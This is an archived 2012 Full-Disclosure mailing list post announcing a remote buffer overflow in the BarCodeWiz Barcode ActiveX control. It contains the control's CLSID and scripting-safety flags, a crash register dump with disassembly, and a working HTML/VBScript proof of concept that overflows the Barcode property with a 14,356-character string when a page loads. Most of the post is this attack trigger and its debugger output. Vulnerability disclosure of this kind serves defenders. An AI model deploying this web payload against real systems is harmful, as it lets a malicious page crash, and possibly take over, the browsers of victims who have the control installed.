lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <CADe7mMdyFMUQ=oJdpseZiix_abUR=3J6n8yU72HsTmYQQrqV9Q@mail.gmail.com>
Date: Wed, 25 Jul 2012 12:40:39 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote
	Buffer Overflow PoC

Exploit Title: BarCodeWiz Barcode ActiveX(BarcodeWiz.dll) remote
Buffer Overflow PoC
Date: July 25, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: http://barcodewiz.com/
Version: 4.0.0.0
Tested on: windows 7 SP2

awesome coolkaveh
==========================================================================
Class BarCodeWiz
GUID: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
Number of Interfaces: 1
Default Interface: IWiz
RegKey Safe for Script: True
RegkeySafe for Init: True
KillBitSet: False
Report for Clsid: {CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6}
RegKey Safe for Script: True
RegKey Safe for Init: True
Implements IObjectSafety: True
IDisp Safe:  Safe for untrusted: caller,data
IPersist Safe:  Safe for untrusted: caller,data
IPStorage Safe:  Safe for untrusted: caller,data
--------------------------------------------------------------------------
Registers:
--------------------------------------------------------------------------
EIP 023F8D42
EAX 00000021
EBX 00000ADD
ECX 025A2F58 -> 02439F8C
EDX 00000001
EDI 0046D48C -> 00000068
ESI 025A2F58 -> 02439F8C
EBP 0046D47C -> 0046E48C
ESP 0046D464 -> 025A0AA8


Block Disassembly:
----------------------------------------------------------------------------
23F8D33	INC EBX
23F8D34	MOV [EBP+8],ECX
23F8D37	PUSH ECX
23F8D38	PUSH DWORD PTR [EBP-8]
23F8D3B	MOV ECX,ESI
23F8D3D	CALL 023F837E
23F8D42	MOV [EDI+EBX*4],EAX	  <--- CRASH
23F8D45	INC EBX
23F8D46	DEC DWORD PTR [EBP-4]
23F8D49	MOV EAX,[EBP-4]
23F8D4C	CMP EAX,[EBP-C]
23F8D4F	JL 023F8C80
23F8D55	JMP 023F8ECE
23F8D5A	MOV EAX,[ESI]
23F8D5C	PUSH EBX


ArgDump:
--------------------------------------------------
EBP+8	00000006
EBP+12	025A2F58 -> 02439F8C
EBP+16	00000068
EBP+20	00000021
EBP+24	00000021
EBP+28	00000021

============================================================================
<html>
Exploit
<object classid='clsid:CD3B09F1-26FB-41CD-B3F2-E178DFD3BCC6' id='poc'
/></object>
<script language='vbscript'>
targetFile = "C:\Program Files (x86)\BarCodeWiz ActiveX
Trial\DLL\BarcodeWiz.dll"
prototype  = "Property Let Barcode As String"
memberName = "Barcode"
progid     = "BARCODEWIZLib.BarCodeWiz"
argCount   = 1
arg1=String(14356, "A")
poc.Barcode = arg1
</script>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ